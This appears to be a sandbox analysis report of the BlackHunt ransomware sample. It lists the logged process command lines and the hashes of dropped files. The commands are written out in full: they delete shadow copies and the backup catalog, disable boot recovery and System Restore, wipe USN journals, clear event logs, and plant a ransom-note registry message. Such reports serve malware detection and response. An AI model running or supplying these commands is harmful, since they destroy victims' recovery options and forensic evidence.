C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\system32\fsutil.exe

fsutil.exe usn deletejournal /D C:

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\system32\wbadmin.exe

wbadmin.exe delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\

C:\Windows\system32\fsutil.exe

fsutil usn deletejournal /D F:\

C:\Windows\system32\fsutil.exe

fsutil usn deletejournal /D C:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup

C:\Windows\system32\fsutil.exe

fsutil usn deletejournal /D M:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Setup

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl System

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected] ,TELEGRAM:@GotchaDec] " /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Application

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Security /e:false

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Security

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\system32\wbadmin.exe

wbadmin.exe delete catalog -quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f

C:\Windows\system32\schtasks.exe

SCHTASKS.exe /Delete /TN "Windows Critical Update" /F

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 5

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected] ,TELEGRAM:@GotchaDec] " /f

C:\Windows\system32\fsutil.exe

fsutil.exe usn deletejournal /D C:

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f

C:\Windows\system32\taskkill.exe

taskkill /IM mshta.exe /f

C:\Windows\system32\notepad.exe

notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 7668 -ip 7668

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7668 -s 1464

Network

Country Destination Domain Proto

Files

C:\ProgramData\#BlackHunt_Private.key

MD5 73446c35218e6ae0c89544784ed6ac3c
SHA1 f394cd41f1dff525d25bfbfb2d1d904a2112da54
SHA256 87c9c27392b63318cbf789bae1474ab9887f0bdaeda89184213a609387759a58
SHA512 fb66882775d7f97a8f1df621922af4c405830ecab21dcf676024b42b6cbd450d53c51a00953eb9d5c4410e476b6c7f0c0cf91ee1db1ec2060f2e1fcc7625a67a

C:\ProgramData\#BlackHunt_ReadMe.hta

MD5 e309e86aa475bf9ab6d9ec368d40fe5a
SHA1 3db62b6572867604cd091a6c518c4458308d002e
SHA256 39c0d064e4419607fa2a3b96691440bb9613e7cf28be9476dbe6c644f07a13d2
SHA512 5d89c38896f51b2e05f3f0a209054cefe770823b929f4ed9c1275df9aaef58b44dae482a3483c295098423a0652672774797ab869dc67967b31af3dfdb151583

C:\ProgramData\#BlackHunt_ReadMe.txt

MD5 88d5b995bf93732281a24ffa8c40ab5c
SHA1 ed0d8cb268e450141673338e131ff2bd97f8b23c
SHA256 69ffdd2db3a73f5a41ba2d4b25d27661112a80f2d403112b11f53454ad5fb5c1
SHA512 ea7a88abc7583e6e50d08b8711fd93bf4d79137e68922c614c9e3ed47fdc0bfae113acd6693ffdbf24dd8c966e667ccee9bb3d958ef28fcbb4aceb9db3ef071e